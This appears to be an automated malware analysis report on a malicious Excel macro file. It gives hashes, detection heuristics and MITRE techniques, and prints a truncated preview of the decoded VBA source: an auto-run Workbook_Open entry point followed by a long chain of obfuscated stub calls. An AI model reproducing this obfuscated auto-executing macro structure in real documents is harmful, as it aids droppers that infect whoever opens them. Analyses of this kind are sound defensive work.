Office (OLE) malware analysis — malicious · 0ba2cf704dbe7339

MALICIOUS

Office (OLE)

762.0 KB Created: 2017-08-03 19:31:19 Authoring application: Microsoft Excel First seen: 2018-09-04

MD5: 90e7a14f5c75eb885284dc82ae3ee271 SHA-1: fac7141a2d9f23780a559198ca9b2f94fc523ef7 SHA-256: 0ba2cf704dbe7339815ab4fee0edbf52d7d077df8b865a13cdb2c5c41c8cae55

208 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample is an Excel file containing a Workbook_Open VBA macro that utilizes the Shell() function, indicating it's designed to execute external commands. The document body explicitly prompts the user to 'enable macros for proper view!', a common social engineering tactic. The VBA code is heavily obfuscated but the presence of Shell() and the lure strongly suggest it acts as a downloader for a second-stage payload.

Heuristics 6

ClamAV: Xls.Malware.Valyria-10036514-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 103999 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	103999 bytes
SHA-256: `872bbb859d8e808568d0241913f3cc374415f64cf972e66c7d99a2e49c62dd56`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Static Sub woRkboOK_opeN(): Call HjQtJEpdADlaPJh: End Sub Function HjQtJEpdADlaPJh() As Currency Call fAoPHggxuVQpqfE End Function Private Function fAoPHggxuVQpqfE() As Long Call hxXtPeuinsXPNfn End Function Private Sub hxXtPeuinsXPNfn() Call UbntGrmagISFqyD End Sub Static Function UbntGrmagISFqyD() As Boolean Call lmOAHaCjacpGQvf End Function Function lmOAHaCjacpGQvf() As Integer Call MnFxiABbJyqUIfW End Function Private Function MnFxiABbJyqUIfW() As Currency Call sLZicUTHDPdxkZq End Function Private Function sLZicUTHDPdxkZq() As Boolean Call iZJJweUXmivlfGZ End Function Static Function iZJJweUXmivlfGZ() As Single Call PpNIFwQpACtnQid End Function Sub PpNIFwQpACtnQid() Call GwgwoFvqEWWBUvw End Sub Private Sub GwgwoFvqEWWBUvw() Call oETIMXVunqfcODk End Sub Static Function oETIMXVunqfcODk() As Currency Call vXfZnQBTrJYSVPv End Function Sub vXfZnQBTrJYSVPv() Call fXCzZhGJvesSXDS End Sub Sub fXCzZhGJvesSXDS() Call mjxeQZQUUywgnvO End Sub Private Function mjxeQZQUUywgnvO() As Single Call UnulpRzGhnGuHKK End Function Static Function UnulpRzGhnGuHKK() As Date Call HuXlsfCJBhZOgVo End Function Sub HuXlsfCJBhZOgVo() Call BIxzskfXUbAwGFN End Sub Function BIxzskfXUbAwGFN() As Date Call WSOvZPYfyVhrLFf End Function Private Sub WSOvZPYfyVhrLFf() Call zjcFCmrycNVARds End Sub Static Function zjcFCmrycNVARds() As String Call CvhxNjZKRHQVBSy End Function Sub CvhxNjZKRHQVBSy() Call NOjCUYiiFASEmgz End Sub Sub NOjCUYiiFASEmgz() Call zddpImHzDtazCKt End Sub Private Function zddpImHzDtazCKt() As Variant Call eeKaPHiqXolGawa End Function Static Sub eeKaPHiqXolGawa() Call ywrIhnxLghGbWQI End Sub Sub ywrIhnxLghGbWQI() Call ZUVFwMmtpZjLTIm End Sub Sub ZUVFwMmtpZjLTIm() Call NTiTOYTheUOEBzz End Sub Private Sub NTiTOYTheUOEBzz() Call XuALGOyTxLFOdgR End Sub Static Sub XuALGOyTxLFOdgR() Call twBUCsUMwHwirNS End Sub Sub twBUCsUMwHwirNS() Call XFzsuOSRvBwQFSP End Sub Function XFzsuOSRvBwQFSP() Call qfxNxvCBjsGMsFN End Function Static Function qfxNxvCBjsGMsFN() As Variant Call CqigTjpLsmUUnzy End Function Sub CqigTjpLsmUUnzy() Call pxLgWwsOLhnoMKc End Sub Sub pxLgWwsOLhnoMKc() Call jLlvWCVcfaOXmuB End Sub Function jLlvWCVcfaOXmuB() As Double Call FVCrDhOjJUuRquT End Function Static Sub FVCrDhOjJUuRquT() Call hlQBgEhDnNjawSg End Sub Static Function hlQBgEhDnNjawSg() As Object Call lyVsqBPPbHdvhIm End Function Function lyVsqBPPbHdvhIm() As Long Call vRXyxqYnPzfeSVo End Function Private Sub vRXyxqYnPzfeSVo() Call hgRlmExEOsnZiAh End Sub Private Function hgRlmExEOsnZiAh() As Object Call MhyWtZYuhoygGmO End Function Static Function MhyWtZYuhoygGmO() As Double Call gyfELFnQqgUCBFw End Function Sub gyfELFnQqgUCBFw() Call uCAlwsEMVcsjFgR End Sub Private Function uCAlwsEMVcsjFgR() As Double Call wWWOrqImoUbfgon End Function Private Sub wWWOrqImoUbfgon() Call rcgrGuQmcPNmPFw End Sub Static Sub rcgrGuQmcPNmPFw() Call czpQfKKRGGKIWCG End Sub Static Sub czpQfKKRGGKIWCG() Call GInoXgIWFBKqlHD End Sub Private Function GInoXgIWFBKqlHD() As Single Call YhlIbNsGtsUmYuB End Function Private Function YhlIbNsGtsUmYuB() As Single Call ksWcxBfQCmhuSpn End Function Static Sub ksWcxBfQCmhuSpn() Call XAzcAOiSWgAPrzQ End Sub Function XAzcAOiSWgAPrzQ() As Integer Call SNZrzULhpabxRjp End Function Private Sub SNZrzULhpabxRjp() Call nXqmgzDoTUIsWjH End Sub Private Sub nXqmgzDoTUIsWjH() Call ypkhsNUfEXOnTXA End Sub Private Sub yp ... (truncated)

SHA-256: 872bbb859d8e808568d0241913f3cc374415f64cf972e66c7d99a2e49c62dd56

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Static Sub woRkboOK_opeN(): Call HjQtJEpdADlaPJh: End Sub
Function HjQtJEpdADlaPJh() As Currency
Call fAoPHggxuVQpqfE
End Function
Private Function fAoPHggxuVQpqfE() As Long
Call hxXtPeuinsXPNfn
End Function
Private Sub hxXtPeuinsXPNfn()
Call UbntGrmagISFqyD
End Sub
Static Function UbntGrmagISFqyD() As Boolean
Call lmOAHaCjacpGQvf
End Function
Function lmOAHaCjacpGQvf() As Integer
Call MnFxiABbJyqUIfW
End Function
Private Function MnFxiABbJyqUIfW() As Currency
Call sLZicUTHDPdxkZq
End Function
Private Function sLZicUTHDPdxkZq() As Boolean
Call iZJJweUXmivlfGZ
End Function
Static Function iZJJweUXmivlfGZ() As Single
Call PpNIFwQpACtnQid
End Function
Sub PpNIFwQpACtnQid()
Call GwgwoFvqEWWBUvw
End Sub
Private Sub GwgwoFvqEWWBUvw()
Call oETIMXVunqfcODk
End Sub
Static Function oETIMXVunqfcODk() As Currency
Call vXfZnQBTrJYSVPv
End Function
Sub vXfZnQBTrJYSVPv()
Call fXCzZhGJvesSXDS
End Sub
Sub fXCzZhGJvesSXDS()
Call mjxeQZQUUywgnvO
End Sub
Private Function mjxeQZQUUywgnvO() As Single
Call UnulpRzGhnGuHKK
End Function
Static Function UnulpRzGhnGuHKK() As Date
Call HuXlsfCJBhZOgVo
End Function
Sub HuXlsfCJBhZOgVo()
Call BIxzskfXUbAwGFN
End Sub
Function BIxzskfXUbAwGFN() As Date
Call WSOvZPYfyVhrLFf
End Function
Private Sub WSOvZPYfyVhrLFf()
Call zjcFCmrycNVARds
End Sub
Static Function zjcFCmrycNVARds() As String
Call CvhxNjZKRHQVBSy
End Function
Sub CvhxNjZKRHQVBSy()
Call NOjCUYiiFASEmgz
End Sub
Sub NOjCUYiiFASEmgz()
Call zddpImHzDtazCKt
End Sub
Private Function zddpImHzDtazCKt() As Variant
Call eeKaPHiqXolGawa
End Function
Static Sub eeKaPHiqXolGawa()
Call ywrIhnxLghGbWQI
End Sub
Sub ywrIhnxLghGbWQI()
Call ZUVFwMmtpZjLTIm
End Sub
Sub ZUVFwMmtpZjLTIm()
Call NTiTOYTheUOEBzz
End Sub
Private Sub NTiTOYTheUOEBzz()
Call XuALGOyTxLFOdgR
End Sub
Static Sub XuALGOyTxLFOdgR()
Call twBUCsUMwHwirNS
End Sub
Sub twBUCsUMwHwirNS()
Call XFzsuOSRvBwQFSP
End Sub
Function XFzsuOSRvBwQFSP()
Call qfxNxvCBjsGMsFN
End Function
Static Function qfxNxvCBjsGMsFN() As Variant
Call CqigTjpLsmUUnzy
End Function
Sub CqigTjpLsmUUnzy()
Call pxLgWwsOLhnoMKc
End Sub
Sub pxLgWwsOLhnoMKc()
Call jLlvWCVcfaOXmuB
End Sub
Function jLlvWCVcfaOXmuB() As Double
Call FVCrDhOjJUuRquT
End Function
Static Sub FVCrDhOjJUuRquT()
Call hlQBgEhDnNjawSg
End Sub
Static Function hlQBgEhDnNjawSg() As Object
Call lyVsqBPPbHdvhIm
End Function
Function lyVsqBPPbHdvhIm() As Long
Call vRXyxqYnPzfeSVo
End Function
Private Sub vRXyxqYnPzfeSVo()
Call hgRlmExEOsnZiAh
End Sub
Private Function hgRlmExEOsnZiAh() As Object
Call MhyWtZYuhoygGmO
End Function
Static Function MhyWtZYuhoygGmO() As Double
Call gyfELFnQqgUCBFw
End Function
Sub gyfELFnQqgUCBFw()
Call uCAlwsEMVcsjFgR
End Sub
Private Function uCAlwsEMVcsjFgR() As Double
Call wWWOrqImoUbfgon
End Function
Private Sub wWWOrqImoUbfgon()
Call rcgrGuQmcPNmPFw
End Sub
Static Sub rcgrGuQmcPNmPFw()
Call czpQfKKRGGKIWCG
End Sub
Static Sub czpQfKKRGGKIWCG()
Call GInoXgIWFBKqlHD
End Sub
Private Function GInoXgIWFBKqlHD() As Single
Call YhlIbNsGtsUmYuB
End Function
Private Function YhlIbNsGtsUmYuB() As Single
Call ksWcxBfQCmhuSpn
End Function
Static Sub ksWcxBfQCmhuSpn()
Call XAzcAOiSWgAPrzQ
End Sub
Function XAzcAOiSWgAPrzQ() As Integer
Call SNZrzULhpabxRjp
End Function
Private Sub SNZrzULhpabxRjp()
Call nXqmgzDoTUIsWjH
End Sub
Private Sub nXqmgzDoTUIsWjH()
Call ypkhsNUfEXOnTXA
End Sub
Private Sub yp
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.